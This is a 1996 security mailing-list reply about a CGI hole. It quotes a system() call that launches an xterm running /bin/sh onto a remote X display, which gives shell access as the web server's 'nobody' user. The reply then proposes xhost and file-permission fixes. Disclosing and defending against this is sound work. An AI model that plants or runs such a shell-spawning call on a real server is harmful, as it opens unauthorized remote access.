[3670] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (Daniel Smith)
Tue Dec 3 18:15:48 1996
Date: Tue, 03 Dec 1996 12:53:02 -0800
To: Andrea Di Fabio <fabio@cs.odu.edu>
From: Daniel Smith <dls@JavaJoint.com>
Cc: www-security@ns2.rutgers.edu
Errors-To: owner-www-security@ns2.rutgers.edu
At 11:46 AM 12/3/96 -0500, you wrote:
>I was experimenting with cgi scripts when I came up with this idea:
>
>What if I have a cgi script which does the followin:
>system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
>
>I can now pop an exterm on my display as nobody.
>This way any user can gain access to the nobody account and
>have fun with it...
>
>Has this been discussed anywhere?
>Is there a fix out there?
Don't do that :-)
The xterm would pop up as the user that runs CGI scripts,
nobody or otherwise. There are at least two basic "fixes":
on the part of users: use "xhost(1)" to limit where your Xserver
will accept connections. This has been discussed elsewhere, and
is only as good of a solution as the sophistication of the user
(or their sysadmin). Caveat User.
on the part of the Web host: chmod(1) X clients to be executable
by owner and group only (750 or sticky/swappable variation thereof).
Users that are intended to access X clients (apart from CGI) would
be a member of a local group, such as "staff" or "xusers". "nobody"
or whatever the user is executing httpd/CGI should *not* be a member
of "staff" or "xusers", etc. This breaks down a little if legitimate users
really need to access X clients through a CGI script, since they
too would be running as "nobody". In that case, they would need to
go through some sort of authentication process (and run a protected
CGI script as a different user, yikes...), or, they should have
copies of X clients on their side, so something like telnet would
fire off a local xterm. Other mime types coming from the server might
invoke other local or remote X clients (assuming some sort of
authentication wrapper, IP/domain check, etc.).
This is a big can of worms. As always, you need to be extremely
careful with system calls. Perl/C/etc. with CGI is giving you
mechanism, not policy, so careful with that Vax, Eugene.
Daniel
